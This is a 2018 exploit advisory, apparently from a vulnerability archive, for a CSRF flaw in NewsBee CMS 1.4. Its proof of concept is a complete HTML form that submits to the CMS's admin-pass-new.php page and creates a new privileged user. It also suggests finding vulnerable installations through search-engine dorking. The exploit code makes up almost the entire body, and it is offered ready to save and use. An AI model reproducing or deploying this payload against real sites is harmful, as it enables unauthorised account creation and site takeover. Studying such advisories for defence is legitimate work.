NewsBee CMS 1.4 CSRF Vulnerability

2018.06.28
dz indoushka (DZ) dz
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

==================================================================================================================================== | # Title : NewsBee CMS 1.4 CSRF Vulnerability | | # Author : indoushka | | # Telegram : @indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 | | # Dork : N/A | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] save as poc.html . <div class="full-height-scroll"> <div class="table-responsive" style="float:left;"> <div> <form action="http://codecanyon.nelliwinne.net/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;"> <label>Username</label> <input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text"> <label>Password</label> <input name="pw" required="" class="form-control" id="pw" value="" type="password"> <label>Permissions</label> <table class="table table-striped table-bordered table-hover " width="300"> <tbody><tr> <td bgcolor="#CCCCCC">&nbsp;</td> <td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td> <td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td> <td width="60" bgcolor="#CCCCCC"><strong>New</strong></td> <td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td> <td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td> </tr> <tr> <td bgcolor="#CCCCCC">News</td> <td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td> <td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> <tr> <td bgcolor="#CCCCCC"><strong>Videos</strong></td> <td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td> <td valign="middle" align="center">x</td> <td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> <tr> <td bgcolor="#CCCCCC"><strong>Gallery</strong></td> <td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td> <td valign="middle" align="center">x</td> <td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> <tr> <td bgcolor="#CCCCCC"><strong>Ads</strong></td> <td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center">x</td> <td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> <tr> <td bgcolor="#CCCCCC"><strong>Home Slider</strong></td> <td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center">x</td> <td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> <tr> <td bgcolor="#CCCCCC"><strong>FAQ</strong></td> <td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center">x</td> <td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> <tr> <td bgcolor="#CCCCCC"><strong>Categories</strong></td> <td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center">x</td> <td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> <tr> <td bgcolor="#CCCCCC"><strong>Pages</strong></td> <td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center">x</td> <td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td> <td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td> </tr> </tbody></table> <input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit"> <input name="MM_insert" value="form1" type="hidden"> <input name="MM_update" value="form1" type="hidden"> </form> <br> </div> </div> </div> </div> Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top